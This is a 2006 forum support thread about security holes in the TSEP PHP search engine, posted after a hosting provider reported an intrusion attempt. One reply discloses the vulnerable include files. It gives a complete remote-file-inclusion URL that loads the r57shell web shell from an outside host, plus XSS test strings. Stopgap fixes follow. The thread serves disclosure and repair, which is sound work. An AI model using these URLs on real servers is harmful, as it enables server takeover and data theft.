Menu

Security Hole

Help
2006-08-02
2013-04-24
  • Nobody/Anonymous

    Here the e-mail I got  from my provider:

    Wir registrierten vor kurzem einen Hackversuch auf unseren Servern, der
    von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
    Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
    Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
    Zugriff auf Ihre Daten erhalten konnte.

    Es handelt sich um das Script `/search/include/copyright.php', welches
    über den Parameter `tsep_config[absPath]' die Ausführung beliebigen
    Codes erlaubt.

    Translation (may not so good):

    We registrated a hacking-raid on our server, that came from your presence. The aggressor tried to get connected to our server by using security holes in your scripts. ...

    It´s a matter of the script '/search/include/copyright.php', which allows execution of any codes by the parameter 'tsep_config[absPath]'.

    How can I close that Security Hole?

     
    • Nobody/Anonymous

      PS:
      I deleted this file, and the code

      request ( ..... /copyright.php ) // Use as many ...

      (I think it was in line 741 of search.php),
      and the search-engine is still working.

      Do you have any other of these security holes in your scriptcodes?

       
    • Nobody/Anonymous

      Hallo there, the following scripts are vulnerable to Remote file include

      ./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void.ru/download/r57shell.txt?
      ./tsep.0942/include/printpagedetails.php ==>         require_once( $tsep_config["absPath"]."/include/convert_htmlent.php" );
      ./tsep.0942/include/ipfunctions.php ==> require_once( $tsep_config["absPath"]."/include/IPv6.php" );
      ./tsep.0942/include/contentimages.class.php ==> require_once( $tsep_config["absPath"]."/include/contentimages.class.php" );
      ./tsep.0942/include/configfunctions.php ==> require_once( $tsep_config["absPath"]."/include/mmexfunctions.php" );
      ./tsep.0942/include/log.class.php ==> require_once( $tsep_config["absPath"]."/include/tseptrace.php" );

      Those scripts are vulnerable to Remote File Include, most likely there are more files vulnerable, but i didnt feel like searching more, temporal fix, register_globals == off, or use .htdocs to block the access to ./tsep/include dir

      The following scripts are vulnerable to XSS, it might not be as dangerous as RFI, but who cares, they need to be fixed.

      ./tsep.0942/include/timeneeded.php?tsep_lng[search_took]=%3Ch1%3Eelite
      ./tsep.0942/include/uploadfile.php?type=%3Ch1%3EXSS
      ./tsep.0942/include/dbconnection.php?db_server=%3Ch1%3EXSS

      - beford <xbefordx gmail com>

       
    • Nobody/Anonymous

      ... and when i say .htdocs i mean .htaccess :]

      -- beford <xbefordx gmail com>

       
    • Olaf Noehring

      Olaf Noehring - 2006-08-03

      HI

      we advise this anyways - but of course we will take care of it in the next version.

      http://www.tsep.info/tsep-latest/docs/install.php#security

      Olaf

       
    • Nobody/Anonymous

      Do you know when the next version is planned?

       

Log in to post a comment.